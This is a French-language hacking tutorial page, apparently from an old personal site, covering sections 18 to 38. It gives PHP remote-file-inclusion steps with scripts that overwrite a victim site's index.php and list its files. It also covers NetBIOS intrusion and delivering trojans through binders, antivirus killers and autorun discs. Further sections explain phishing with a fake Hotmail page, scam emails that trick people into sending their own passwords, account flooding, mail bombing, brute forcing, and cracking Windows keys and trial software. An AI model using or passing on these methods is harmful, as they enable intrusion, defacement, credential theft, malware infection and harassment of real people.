L'URL suivante http://www.site.com/index.php?page=test  dit qu'elle charge une page test.php standard puis y inclut le code de la variable $page, suivit de l'extension PHP bien évidemment. ici la page qui sera visible sera donc la page test.php.Il faut comprendre que http://www.site.com/index.php?page=test revient à indiquer l'URL http://www.site.com/test.php

Il faut trouver un site avec des url mal foutue (où il y a un égal )
par exemple :
www.lesite.fr/index.php?url=page.php
http://www.site.fr/index.php?var=admin.php

Il est simple de vérifier s'il n'y a pas de protection , essayes d'inclure une url (google.fr par exemple) :
http://www.lesite.fr/index.php?url=http://www.google.fr ou http://www.site.fr/index.php?var=http://www.google.fr
Là si l'index de google apparaît dans le site , c'est que le site n'est apparemment pas protégé et facilement piratable

on peut ensuite (par exemple) effacer le site
Au lieu d'ajouter une url il suffit d'ajouter du code par exemple
fwrite() ce qui aura pour effet de d'éffacer l'index du site de la base de donnée php Il suffit de faire ce petit script php et de le stoker sur ftp par exemple pourqu'il soit permanent en introduisant le script suivant:
 

$fp=fopen("index.php", w);
fwrite($fp,$msg);
fclose($fp);
?>

*tu peux inclure un message $msg="ton message";
Pour lancer ce script:
www.lesite.fr/page.php?url=http://[adresse url du script]/nom de la page du script.php


Pour afficher tous les noms de fichiers du site (très utile pour savoir où se trouve le fichier config.php , admin.php etc), créé un fichier avec le code php placé sur un ftp par exemple, le code suivant scan le site php et t'affiches les résultats.

<?
function scann($rep){
$dir=opendir($rep);
while($file=readdir($dir)){
if(is_dir("$rep/$file") && $file!="." && $file!=".."){
scann("$rep/$file");
}else{
echo "$rep/$file<br>";
}
}
}
scann(".");
?>

une fois ce script sur ton ftp tu l'exécutes par le serveur victime comme ceci :
http://url_sitephp/page.php?var=http://url_ftp/source_du_fichier.txt (txt pas php)
Maintenant que tu connais toutes les pages, les .htaccess et les .htpasswd, tu peux les voir, les effacer et les modifier de la même façon (voir code de suppression ci dessus)

18. passez la protection du clic droit

certains sites interdisent l'utilisation du clic droit via un script qui génère un message. Il suffit juste d'utiliser mozilla Firefox ou d'appuyer sur entrée avec Internet explorer pendant le message pour avoir accès au menu du clic droit. Pratique pour les skyblogs par exemple. Personnellement sur mon site le message s'affiche mais il n'y a pas moyen d'avoir accès au menu déroulant, vous pouvez retrouvez ces scripts sur le forum du site.

19. Intrusion par Nbstat

Je croyais que ça ne marchait plus et ben quelques fois si, de toutes façons c'est intéressant.
Cette technique consiste à s'introduire via le module de recherche de windows sur un ordinateur distant. La cible doit avoir un firewall microsoft ou un firewall mal configuré un vieu service pack si possible.

Tu dois connaitre  l'adresse ip du PC cible. Utilise Ethereal, ms-dos,une requête ping,... pour plus d'infos reporte toi aux dossiers précédents.
ensuite lance msdos (cmd.exe) et tape "nbtstat -A 'ip' " .Si on te dis "Host not found" laisse tomber... Par contre si parmi les données affichées tu voies  un "20" quelque part alors c'est bon.
Tape maintenant "edit lmhosts" et édite le fichier de la manière suivante : tapez l'ip suivi d'un espace suivi du nom du pc entre guillemets   (il est affiché quand vous faites nbtstat -a...)   192.168.0.1   "name"   par exemple.
Enfin sauve le fichier et retournez sous msdos. La tu tapes "nbtstat -R" (R majuscule)
Pour finir va sous windows et faites rechercher ordinateur : sous windows ME (xp par exemple) tu dois aller dans rechercher, fichier ou dossier, puis descendre un peu et sélectionner la case "ordinateur ou personnes" tu dois voir apparaître le pc ciblé sinon c'est qu'il a une erreur dans les étapes antérieures.

remarques
Si tu ne trouves pas la commande "rechercher ordinateur", fait un clic droit sur poste de travail puis "connecter un lecteur réseau". Tapez ensuite quelque chose comme "\\name\c" ou name est le nom du pc et c le nom du lecteur.

Tu dois avoir configurer votre pc avec des protocoles réseau standard de type NetBEUI et TCP/IP .

20. Contrôle à distance

De nos jours il peut être pratique d'avoir accès à distance à un de ses pc. Via le protocole ssh et le logiciel putty vu précédemment il y a facilement moyen si l'on connaît les mot de passes et bien sur l'ip ou un indicatif autre. Frauduleusement le contrôle à distance est déjà plus difficile. Via un trojan de type backdoor (ex : ProRAT) on peut désactiver les sécurité de windows, ouvrir un port et prendre le contrôle. La cible ne doit pas être équipée d'antivirus qui connait le trojan.
Comment ça marche ? Il faut d'abord envoyer le trojan, ce dernier fait office de serveur entre la cible et le pirate. Ensuite le pirate via le prog du trojan se connecte au serveur avec l'ip de la cible. En fonction du type de trojan tout est faisable : recherche, damages, téléchargement, screenshot, informations, etc.
Bien que je déconseille ProRAT , tu peux aller le dl sur le site du fabricant, le mot de passe pour le dézipper est 'pro'

21. Lancer plusieurs sessions msn

Je sais ce n'est pas vraiment du piratage mais bon c'est quand même très pratique. Le petit prog qui permet ce miracle s'appelle Msn loader universal; il permet de lancer autant de sessions MSN Messenger ou WIN Messenger que vous le voulez. De plus il est très petit néanmoins si tu as MSN+ mieux vaut utiliser un plugin.
clique ici pour télécharger Msn loader universal (3Ko)

MSN spy 2004 est un petit programme très amateur qui permet via un serveur souvent hors service (hélas) de voir qui vous bloque où est hors ligne sur MSN. Perso j'utilise éthéreal là on est sur.
télécharger :
MSN spy (740Ko .zip)

nouveau : http://dagost.free.fr/msn_status.htm
 

22 naviguer sous une fausse ip

Pratique pour rester caché ou se sécurisé lors d'un mail bombing par exemple. voilà une liste de site et de logiciels (avec leur code de validation pour les freewares) qui proposent de te naviguer en cachant ton ip souvent par l'intermédiaire d'un proxy.
Anonymous browzing    il faut s'enregistrer... faux nom comme d'habitude :)
proxy way, (en anglais) permet de naviguer derrière un proxy (il faut connaitre un proxy) il y a une bonne aide
anonymous guest (en anglais) teste la qualité des proxy et leur fonctionnalités
->pour envoyer un mail anonyme : http://www.fakemailz.com (en anglais)
+ regarde le tutorial sur les proxys.
+ le tutorial 2

23. commande dos pour killer un processus

La commande est tskill suivi du nom du processus, pour ferme le bloc note par exemple : tskill notepad. On peut aussi fermer sa connexion internet. Attention il faut être admin pour fermet certains processus et si tu les fermes tous la session se ferme. Voici les détails de cette commande :

tskill {idprocessus | nomprocessus} [/server:nomserveur] [/id:idsession | /a] [/v]

idprocessus      ID du processus à terminer.
nomprocessus  
Nom du processus à terminer. Vous pouvez utiliser des caractères génériques pour indiquer ce paramètre.
/server:nomserveur   Indique le serveur Terminal Server qui contient le processus auquel vous souhaitez mettre fin. À défaut, le serveur Terminal Server en cours est utilisé.
/id:
idsession
   Met fin à l'exécution du processus dans la session spécifiée.
/a    Met fin à l'exécution du processus dans toutes les sessions.
/v     Affiche des informations sur les actions en cours d'exécution.

24. lynx - un navigateur web sous forme de texte

Que tu aies un portable avec grs, un 56Ko, envie de faire comme les grands, ou que tu veux plus de sécurité, lynx est fait pour toi. Concrètement lynx est un navigateur (comme Internet explorer ou Modzilla) sauf qu'il n'affiche que les textes tout en gérant bien le code html et php. D'origine un programme de Linux, lynx existe en version pour tous les Windows  à partir de la version de 95.
Il est en anglais mais très simple, quand tu l'as installé (très simple sur cette version) lance le et à chaque fois que tu appuieras sur la touche g (go) le programme te proposeras de rentrer l'url à visiter.

téléchargements :
lynx.exe 1,73 Mo
lynx.exe (zippé) 1,71 Mo

25. Pirater un compte Netpassport (Msn & hotmail)

IL n'y a pas de programme proprement dit qui te trouvera le mot de passe d'un compte Microsoft Netpassport. Même à l'époque ou Msn et Hotmail se faisaient régulièrement attaqués il n'y en a jamais eu...
Même s'il n'est pas impossible d'avoir ces informations tout ceci reste difficile par une manière directe. néanmoins des solutions existent, bien souvent en jouant sur l'erreur humaine, le social enginering (ci dessous)


1. le fake mail

Tu fais croire à ta cible qu'elle pourra découvrir tous les mdp qu'elle voudra avec une fausse technique que tu lui donnes (voir exemples) En fait tout cela est faux (fake en langage pgm) et tu récupères ses informations.
note : si tu as une adresse plus sérieuse que passmail@hotmail.fr (qui n'existe pas) ça le fera plus. On trouve ce genre de message un peu partout sur les petits forum traitant du piratage.

exemples:
Voici comment "Hacker" le compte d'un "ami" .
Vous pouvez obtenir le password de votre "ami", et c'est même Hotmail qui vous le dira !! Voici comment:
Méthode:

1.Entrez dans votre compte e-mail .
2.Allez dans "Nouveau Message"
3.Dans le champ "À", tapez: passemail@hotmail.fr 
(là tu y met ton adresse à toi ;) )
4.Dans le champ "Objet", tapez: Password Retrieve
5.Dans le champ du message, tapez:
209.34.567.12/passwriter/passemail@hotmail.fr"passemail@hotmail.fr/INSCRIVEZ VOTRE ADRESSE EMAIL/somms/ read/send./somms/INSCRIVEZ VOTRE PASSWORD/56.23.78 /somms/ 124.23.456/INSCRIVEZ LE LOGIN DE LA VICTIME/passretrieve101>
6. Envoyez et attendez quelques heures !!
Exemple:
Si mon adresse est "moi@hotmail.com" et mon password "XXX", et votre victime "victime@voila.fr" alors le message sera comme ceçi :
209.34.567.12/passwriter/passemail@hotmail.fr"> passemail@hotmail.fr101/moi@hotmail.com/somms/ read/send./somms/XXX/56.23.78 /somms/ 124.23.456/victime@xxxx.fr/vous trouverez le mot de passe ici !!!/>

je me degage de toute responsabilité, g testé personnellement, ca marche !!


2eme exemple de fake

Méthode:

1.Entrez dans votre compte e-mail .
2.Allez dans "Nouveau Message"
3.Dans le champ "À", tapez: robotmsn@hotmail.com
4.Dans le champ "Objet", tapez: mot de passe oublie
5.Dans le champ du message, tapez:
robot.msn7@hotmail.com : INSCRIVEZ VOTRE ADRESSE EMAIL
INSCRIVEZ VOTRE PASSWORD
robot.msn7@hotmail.com : NSCRIVEZ LE LOGIN DE LA VICTIME
6. Envoyez et attendez quelques heures !! .



2. Le fake site

Il suffit de copier à l'identique le site de mail de hotmail (très simple : copie colle la source de plus le décor autour du formulaire est composé de trois Iframes) et de modifier le destinataire des informations de conexions (hotmail devient toi) ensuite redirige le pigeon sur www.hotmail.com après un message d'erreur et le tour est joué. Il croira s'être gouré en tapant...
Ci-dessous des informations sur la création d'un formulaire et une page hotmail où tu pourras insérer ton formulaire.
Téléchargements :
**fakesite cgi **

code formulaire pour cgi/mail (.doc pour word)
**fakesite php **
page fakesite php   exemple en ligne
**
divers**

code html d'un page hotmail vierge (format texte)
note : n'hésitez pas à regarder et modifier les sources pour y faire des modifications d'abord pour vous les personnaliser mais aussi pour améliorer le graphisme.


3. Pro-hack (vieux rêve)

Tu infiltres le réseau d'hotmail via une trojan autonome capable de décoder le tableau des mots de passes et de t'envoyer les informations que tu cherches. ça relève du domaine de l'impossible mais quelqu'un qui travaille dans les locaux de Microsoft pourrait le faire.

4. méthode diplomatique

Écris un email à hotmail pour signaler un viol de leur charte de bonne conduite (donne des exemples) par l'adresse que tu veux supprimer. Soit l'adresse cible gicle soit elle reste.

5. Moyens alternatifs (pas testés profondément)

Il existe des programmes pour flooder le compte MSN / hotmail et donc le paralysé, temporellement ou définitivement. Voici deux programmes : l'un flood en essayant des logins et des mots de passes et l'autre en rentrant le contact dans MSN sans cesse...
Seul problème il faut que le programme tourne tout le temps ou au moins assez longtemps pour faire planter le compte.

programme 1 : Wolf pack MSN bomber :
 
Écrit en Visual C++ , ce programme permet de “flooder” de demande d’add-contact un utilisateur MSN. Attention, si un nombre trop grand de demandes est envoyés, il est possible de flinguer définitivement en compte et d’empêche un utilisateur avec cette identité. Ce programme est détecté par ton antivirus lors de son utilisation. 
. télécharger  703Ko .zip
programme 2 : Ice cold reloader : (100% sur )
Ce programme permet de freezer le compte MSN (hotmail) de votre choix. Vous rentrez l'adresse que vous voulez freezer et la le logiciel  se connecte sur les serveurs net passport en mettant des pass erronés.Ce qui a pour effet de flooder l'adresse de demandes, et la victime ne peux plus se connecter sur MSN ou pour consulter ses mails. Attention!! une fois que vous quittez le logiciel le compte n'est plus freezer et si le contact est sur MSN il n'a pas de problème. Ce prog est correcte et montre l'évolution du freezage, quand tu le quittes il lance une page internet.
. télécharger  6Ko .zip
screenshot de ce que ce prog donne :

6. Brute force : se reporter au programme wwwhack qui permet de bruteforcer un formulaire - ne marchera pas pour hotmail.

26. Scanner l'arborescence d'un site

Des programmes permettent de te donner l'arborescence complète d'un site, il te permet par exemple de voir le chemin des dossiers en php, des forums, des skyblogs, récupérer des médias protégés, un dossier entier sans se taper le site, etc
Via mon site tu peux télécharger le plus connu des scanners de site :
Intellitamper (v2.07)
scrennshot du scan du site de mon lycée

Intellitamper (v2.08 bêta 4) la toute dernière version, cette version corrige les erreurs qui rendaient Intellitamper 2.07 instable et le forçait à fermer.

Si certains dossiers protégés sont impénétrables, l'utilisation de logiciels équivalent comme Custo peut corriger ce problème mais Intellitamper fait l'affaire dans 95% des cas s'il n'y a pas de Htaccess. Liste ci dessous.
. télécharger Custo (395Ko)

description officielle traduite de l'anglais :

- trouve les liens vers les fichiers html, Java script (partiellement), les fichiers Macromedia Flash SWF ...
- possibilité de passer par un proxy
- matériel pour les sites protégés par mots de passe
- Interface d'exploration simple et efficace, présente les dossiers, les fichiers et les liens trouvés (emails compris)
- La sélection des fichiers ou des dossiers complets est possible pour le téléchargement
- Découverte de dossiers et fichiers cachés grâce à une recherche avec dictionnaire
- Accès direct pour à les fichiers pour les ouvrir dans un navigateur ou avec un logiciel quelconque.

liste de programmes similaires :

 Afreet Site Viewer
 
GetRight (check Browser part)
 
HTTracker Website Copier
 
Link Explorer
 
Teleport Pro
 
WebReaper  
Les liens Internet peuvent ne plus fonctionner. Pour faire une recherche manuelle : [lien]  

27. Pirater un site via un forum en phpBB

Le fichier config.php contient le login, l'url et le mot de passe du ftp du site d'où est le forum ! L'ennui c'est que les nouvelles versions de phpBB protègent bien ce fichier. Pour voir le fichier config.php dans Intellitamper rentre l'adresse complète, exemple : au lieu de 'http://site.free.fr' rentre 'http://site.free.fr/forum/phpbb2/config.php' en espérant qu'il n'a pas été changé de place par sécurité, plus d'infos sur le forum.

28. Faire Windows Update discrètement

Si tu as un windows 'légal' c ceci ne te servira pas spécialement, mais si tu ne veux pas te faire espionner et contrôler par Microsoft lors des mises à jours de windows voici deux solutions dont la première spécial pour xp.

1. configuration du firewall
Interdit l'accès au net du programme "Noyau et système Xp". Ce module ne servant qu'à t'espionner devrait d'ailleurs être toujours bloqué.
2. modification du registre système
regedit dans éxsécuter puis : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion  et mettez la valeur 1 à la clé REGDONE.

29. Générer une clé de Windows xp et la remplacer/voir la clé active

voici un programme pour générer des clés windows xp et un autre pour l'utiliser (remplacer l'ancienne) et voir la clé en cours.
http://dagos.free.fr/prog/XP.exe 92Ko
http://dagos.free.fr/prog/keyfinder.exe 258Ko
 

 

 

 

30. refaire fonctionner un freeware après le temps prévu

la réinstallation du programme ne change rien vu que la trace de son installation ultérieure est enregistrée dans le registre système de windows. Voici deux techniques pour remédier à ce problème sans payer et sans réinstaller windows. Je suppose que la restriction est basée sur le temps.

1. Suppression manuelle du registre système
Cela consiste à supprimer les 'clés' du programme en ouvrant le registre windows (tape regedit dans EXECUTER pour l'ouvrir). Évidement c'est plus simple si tu connais le nom des clés. En tout cas ce sera long.

2. faire croire à une date ultérieure
retarder l'horloge ne marche plus en général sur les nouveaux programmes. Sur les petits ou les vieux progs de test il suffisait en effet de retarder la date de quelques jours pour que le programme redevienne utilisable.
Il existe des programmes qui génèrent des .exe modifiés... Ces programmes font croire au luncher une date préprogrammée et donc rend possible l'exécution du programme ! je te propose data cracker c'est un petit prog gratuit qui créer un nouveau .exe mais qui marchera vu qu'il sera craké , voici l'url de téléchargement :
. http://dagos/free.fr/prog/Dateckr.zip
Après avoir craker ton logiciel utilise le nouveau .exe

Il existe aussi un logiciel prévu pour ceux qui ont perdus leur clé d'activation, il permet de bloquer le temps d'essai,le rendant ainsi disponible illimité : http://www.chez.com/wblum/ Il permet de neutraliser son blocage en lui donnant une durée d'utilisation plus importante
 

31. Créer un serveur chez sois (ici FTP)

Un serveur c'est un petit programme de quelques Ko que tu peux télécharger sur le net donc ne t'inquiètes pas ce n'est pas très compliqué à mettre en place. Sur http://www.cestfacile.org/creer_un_serveur_ftp.htm#serveur tu peux trouver ce programme. Avoir un serveur ftp, un serveur de donnée donc comporte plus de risques que si tu n'avais pas de serveur mais ils sont minimes et même si tes logins et mots de passe sont découverts à part prendre, mettre ou supprimer un hacker ne peut rien faire : le protocole ftp n'a que 3 commande : PUT GET et DELETE .

pour t'y connecter il te faut
. un client ftp : internet explorer ! par exemple.
tu tapes l'url ftp://ip_de_ton_serveur/ et tu rentres login & mot de passe dans FICHIER/se conecter en tant que.
L'invité de commande dos fait client ftp : :
 

l'adresse ip de ton serveur c'est l'adresse ip de l'ordinateur qui a le serveur ! (tu l'as en tapant ipconfig dans l'invité de commande dos de windows) Comme c'est un serveur FTP tu peux te connecter dessus avec Internet explorer en FTP (avec mot de passe et log)  parce que INTERNET EXPLORER EST UN CLIENT FTP ET HTTP ! - peutêtre pas le meilleur certes mais il est largement suffisant.

notes : ftp : port 21 et 20 - http : port 80 (ça peut servir)
Aides :

1. Connexion impossible à partir d'un ordi autre que le serveur
Ce problème est lié au port 21 qui peut être bloqué par un firewall mais aussi par le parefeu windows. Il faut donc faire des tests quand tout est désactivé.

2. L'adresse n'est pas ou plus correcte
En général c'est lié à un problème d'IP dynamique.
Déjà tu peux avoir un nom de domaine (ip en lettre) gratuitement sur des sites comme https://www.dyndns.com/ mais il faut aussi que ton adresse Ip qui bouge tous les 20 minutes soient mise à jour. Sinon le nom de domaine ne correspond plus à l'ip du serveur. Des petits programmes le font très bien, moi j'utilise DynDNS updater.

3. dossiers inaccessibles
Ces problèmes sont liés au root directory dans la configuration. Fait des changements pour tester. Mets c:/ showing etc...

4. clients ftp
Mozilla contrairement à Internet explorer n'a pas un module de client FTP intégré. Il reste toujours MS DOS où un freeware client ftp trouvable très facilement sur le net.

Au sujet de IIS : si vous décidez d'installer un serveur quelconque (smtp, ftp ou http) pensez à arrêter IIS, il peut y avoir des conflits au niveau des ports d'écoutes.
 

32. Scripts HTML et techniques anti pub , frames et publicités quelconques.

Voila (hébergeur gratuit avec un système de transfert de fichier non ftp donc mauvais, sans php)
pour éviter d'avoir cette frame à l'écran la seul parade est de rajouter : /index.html à la fin des liens

sans :
http://site.voila.fr/ttgerminois
et avec : 
http://site.voila.fr/ttgerminois/index.html

Lycos (hébergeur gratuit 50Mo (base php mysql 10Mo) )
 

scripts 1 et 2 - enlève la pub de 5 cm à droite et l'énorme pub bleu du haut
 
Code:
<script language="JavaScript">
<!--
function kill_ad()
{
window.top.document.body.cols = "*,0";
setTimeout("kill_ad()",10);
}
function setInterval(x,y)
{
return 0;
}
window.setTimeout("kill_ad()",10);
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
-->
</script>
<script>

function pub(){

window.top.document.body.cols="*,0";

}

</script>
 


script 2 - ferme le popup de démarrage

 
Code:
<script language="javascript">
function open () {return true;}
</script>


téléchargements des scripts : [1] [2]

Ifrance
IFrance ajoute seulement des pubs aux
fichiers *.html. Donc remplace index.html par index (aucune
extension) ou *.shtml

Utilise le script suivant :
Tu dois placer d'abord ceci après <HEAD>
<script language="javascript">
if (window.top.frames[0].name == "pubframe") window.top.document.body.rows = "0,*";
ie5=false;ie4=false;ie55=false;ie6=false;
ifrUrl = '';
stopMove();
stopVis();
resetVis(window);
cachePub();
window.open = false;
</script>


et ceci après <BODY>
<div id="pubLay" onLoad="javascript:resetVis(window);"><DIV>
 

33. créer un serveur windows de type IIS

Windows Xp propose des outils pour se créer facilement un serveur chez sois. Concurrent du très puissant et efficace mais complexe serveur Apache le serveur windows IIS permet de créer très facilement un serveur http aux normes et un serveur ftp et smtp. Le serveur http marche parfaitement mais le serveur ftp pose des problèmes au niveau des créations des comptes utilisateurs, en gros seul quelqu'un ayant un compte sur la machine peut s'y connecter avec son nom de compte et son mot de passe. IIS est un composant optionnel windows, il faut donc pour l'installer avoir le cd de windows : va dans ajout/suppression de programmes qui est dans le panneau de configuration et clique sur composants optionnels. Ensuite après son installation règle les options dans outils d'administration/Serveur internet (IIS). Pour plus d'information se reporter au sujet 31 ou encore sur le forum.

34. Insérer un exécutable .exe dans un fichier quelconque

Ce procéder s'appelle binder, en français 'dissimuler'. Ce procédé est très pratique pour infecter une personne, en effet il suffit de lui envoyer un fichier avec un trojan, un virus, etc binder dedans pour l'infecter sans que ta cible ne s'en rende compte. Les binders pour le hacking ont plus d'options que ouvrir/executer il peuvent par exemple placé le programme bindé directement dans le répertoire system. Le problème c'est que 50% des programmes binder et joiner téléchargeables sur le net sont corrompus, c'est à dire qu'ils contiennent des virus ou trojan ou en insère un dans le fichier crée à la suite du bindage. Pour plus de sécurité tu peux aussi télécharger un programme payant (
. nbinder par exemple) mais ils ne sont pas spécialement fait pour le hack comme Binder v2.1 par exemple (voir ci-dessous)
Téléchargements :
. 32 Binders
signifie que le binder marche, qu'il est sain même s'il est détecté par un antivirus et que le fichier bindé est sain aussi.
certains binder ne compilent pas directement, il faut juste que tu renomme le fichier crée en .exe.
certains binders proposent d'implanter une icône au fichier bindé, certains en ont en pack en plus.
dl indique qu'il y a moyen de faire télécharger/uploader un fichier via le net - détecté par tout firewall bien entendu.
 

    test & commentaire avec icône
 AFX Executable Binder PRO.zip 310.6 KB plusieurs .exe non
 A simple Binder By Blackcobra.rar 13.5 KB seulement deux .exe non
 Binder par chti hack.rar 250.6 KB   paramètres manuels oui
 Binder v2.0 beta 1.rar 460.9 KB   fait pour nuire (béta) oui (avec pack)
 Binder v2.1.rar 473.4 KB paramètres webs, dl oui (avec pack)
 Deception v4.0.rar (kit de construction) 367.2 KB tous types de fichier, dl non
 F.B.I.rar 224.0 KB seulement deux 2.exe oui
 File Injector v2.zip 34.4 KB tout type, message oui
 File Injector v3.rar 997.4 KB pareil + cryptage oui (win98 ok)
 Frusion v1.0.zip 28.2 KB plusieurs.exe oui
 Fusion 1.0.zip 465.4 KB tout type, messbox, dl oui
 HammerBinder v2.0 Standar Edition.rar 751.1 KB non testé  
 Hammer Binder v3.0 FIX!.rar 308.3 KB non testé  
 Hammer Binder v3.0 Pack1.rar 335.6 KB non testé  
 Hammer Binder v3.0 Pack2.rar 2.2 MB non testé  
 HammerBinder v3.0.rar 2.0 MB non testé  
 Hook Tool Box.rar 51.1 KB une image + un exec oui
 Inbinder v1.0.zip 76.9 KB une image + un exec non
 Interlaced II v1.00.zip 307.0 KB non testé  
 Interlaced v1.00.zip 274.2 KB non testé  
 MicroJoiner v1.1.zip 5.4 KB non testé  
 MicroJoiner v1.3f.zip 11.4 KB non testé  
 MicroJoiner v1.5.zip 15.6 KB non testé  
 MicroJoiner v1.6 - Beta.zip 13.6 KB non testé  
 MicroJoiner v1.6.zip 13.6 KB non testé  
 MicroJoiner v1.7.zip 14.0 KB non testé  
 MVM v1.0.rar 1.7 MB non testé  
 NakedBind v1.0.zip 132.0 KB non testé  
 NG Binder Pro.rar 155.1 KB non testé  
 Reductor 1.0b (Beta 4).zip 37.4 KB non testé  
 SCD [ binder ] v1.0.zip 64.4 KB non testé  
 YAB 2.01.zip 386.6 KB non testé  

35. spammage par mail bombage

Consiste tout simplement a envoyé pleins de mail sur une boite pour la saturée ou juste déranger son propriétaire. Mailler V3 est un programme de mail bombage non détecté par les antivirus pour le moment lors de l'installation s'il y a un problème de .dll clique sur oui pour garder tes dll. Kaboom qui n'est pas non plus détecté par les antivirus est un mail bomber basique, j'ai placé une liste de mail bomber ci-dessous.
Un serveur smtp sert à envoyer des mails, ce n'est donc pas celui à qui tu envoie mais toi, si tu veux connaitre ton serveur smtp (simply mail transfert protocole) clique ici c'est par exemple smtp.neuf.fr, smtp.exemple.fr  il y a donc pas besoin de login et de mdp, rien ne t'empêche de te créer ton propre serveur smtp mais tu peux passer par tous les serveurs smtp existant. Attention tes mails ne sont pas vérifiés par sender id. 
télécharger :
  Mailler V3     . Kaboom

Les mail bombers ci-dessous fonctionnent mais sont détectés par les AV comme flooders donc supprimés par défault :

lien : générateurs de messages de Spam et de sources (en anglais)
 

36. wwwhack - hacktool brute force avec proxy manager

En plus d'avoir un manageur de proxy qui permet de changer de proxy toutes les x requêtes selon votre propre liste de proxy wwwhack permet d'effectuer de la brute force sur les protocoles suivants : POP3 , FTP, formulaire html, basic html (htaccess).
Il contient comme outils un DNS, petit programme qui change un nom de domaine en son adresse IP correspondante (permet de ne pas faire de ping) et en bonus un crasher de serveur par flood. Oui il pourrait servir à hacker les adresses hotmail donc car malgré que pop.hotmail.com ou smtp.hotmail.com n'existent pas ça reste un serveur perl avec un formulaire html mais hotmail bloque au bout de x requêtes (cf: icecold reloader et autres flooders)
télécharger wwwhack (.rar 363Ko)

37. Les trojans

Les trojans, appelés aussi chevaux de Troie, backdoor, troyens, ... sont des petits programmes intrus installés sur un ordinateur. Ils différent légèrement des spyware et des keyloggers car leur rôle est supérieure à du simple espionnage et leurs effets sont le plus souvent néfastes pour l'intégrité des données. On distingue plusieurs grands types de trojan :
. trojan de dl : permet de rechercher et de récupérer des donnés sur la machine trojanée, ne pas confondre avec trojans downloaders qui eux téléchargent des virus
. trojan standard : comprend généralement la fonction des trojans de dl mais a des capacités supérieures allant du simple screenshot ou exécution de commande à la destruction de données.
. backdoor : ouvre un port virtuel à l'instar du firewall windows et envoie l'ip, permet un début de piratage
. cheval de Troie : au sens négatif télécharge une multitude de virus et autres malwares par un port ouvert par un backdoor par exemple.
. dropper : il s'agit de programmes pour binder
note : des trojans proposent toutes ces options (proRat) mais leur taille et le fait qu'ils soient très connus des antivirus les rend plus difficiles à utiliser.

Utiliser un trojan est simple mais la machine cible doit répondre à deux critères : avoir un système d'exploitation compatible au trojan et être mal ou pas du tout protégée. Le "kit" trojan est toujours composé, dans le cas où tu dl un trojan tout fait d'un site, du master. Le master, le maître, est le programme qui contrôle le trojan, en général il permet de créer et de personnaliser ton propre trojan. Le maître peut être détecté par les antivirus mais est sans danger s'il n'est pas lui même virussé. Si ton trojan est placé sur la machine cible, qu'il peut se conecter au net alors le master n'a besoin que d'une information pour te permettre de contrôler la machine cible : l'ip de la machine cible. Certains trojans envoie l'ip automatiquement par mail si tu dispose d'un serveur smtp, ou par ssh pour les plus perfectionnés.

Pour envoyer un trojans de très nombreuses techniques existent et sont inventables avec un peu d'ingéniosité. Déjà pour qu'un trojan même ultra connu soit indétectable il suffit de fermer l'antivirus de la victime, pour cela de nombreux programmes, des AV_killer existent [lien] Il faut aussi penser à couper le firewall s'il y en a un (pour permettre au trojan de communiquer via le net sans être bloqué), la plupart des AV_killer ont cette option. Ci dessous les techniques les plus courantes pour envoyer trojans, virus et keyloggers :
. bindage via un prog, si tu bindes un trojan à un AV_killer c'est doublement efficace.
. download forcé, pour les webmaster à chaque téléchargement un deuxième téléchargement se lance (avec le trojan) comme ça la victime peut se tromper et lancer direct le trojan. Dans ce cas là prévoir un trojan qui se reproduit et pas d'AV_killer car détecté directement.
. download via mail, le trojan est en pièce jointe, avec un email avec du html inséré faire télécharger la pièce jointe automatiquement
. faux lien de téléchargement, le lien recherché emmène vers un trojan et non vers le fichier désiré. Les sites qui font ça sont vites repérés par les connaisseurs.
. sur floppy, disquette, cd avec un autorun --> pas à distance mais le plus efficace car : rapide, place énorme pour stoker les malwares, on peut définir les ordres d'action : 1.Av_killer 2.trojan 3.keylogger 4.virus 5.pc_killer par surcharge électrique (cd uniquement car programme lourd)
 

Si tu découvres un trojan actif sur ta machine il faut la soigner calmement, un trojan comme on l'a vu ci dessus n'est pas forcement dangereux et surtout pas forcement contrôlé. La première chose à faire est de couper toutes les conexions réseaux et Internet pour éviter la propagation et/ou le piratage à distance. Ensuite enlève le démarrage automatique du trojan en allant dans msconfig puis il faut tenter de couper le trojan, pour cela il suffit de repérer son processus dans le gestionnaire des taches (ALT CTRL SUPPR) et de le fermer mais en général dès que tu le fermes un autre se rouvre. Évite de redémarrer si tu n'a pas vérifier ton msconfig. Certains trojans dispersent des virus un peu partout et peuvent saturer ton antivirus, n'hésite pas à redémarrer en mode sans échec et de passer l'antivirus avec ce mode (attention ne pas se connecter au net avec le mode sans échec). Après le passage de l'antivirus il te suffit de scanner la totalité de tes données avec des logiciels comme adaware ou encore spybot (téléchargeables sur ce site).
Si le trojan est passif c'est à dire compressé dans une archive par exemple supprime le simplement.

Téléchargements : . 14 dossiers et 53 trojans recensés ci dessous soit un total de 144 trojans :

38. Quelques compilateurs

Ces compilateurs windows ou pour systèmes alternatifs (GNU, Linux, ... ) fonctionnent et sont sécurisés, tu peux en avoir besoin notement pour les bindages (où il faut souvent un exécutable correcte et non un .bas .bat ) ou tout simplement pour concrétiser tes programmes réalisés en basic, C, pascal, ...
 

nom officiel capacités taille
Bat2exe compile les .bat en .com (via invité de commande) 7Ko rar
Quick batch compiler 2.0.7.1 (cracké !) compiles les .bat (et plus) en .exe 1.5Mo rar
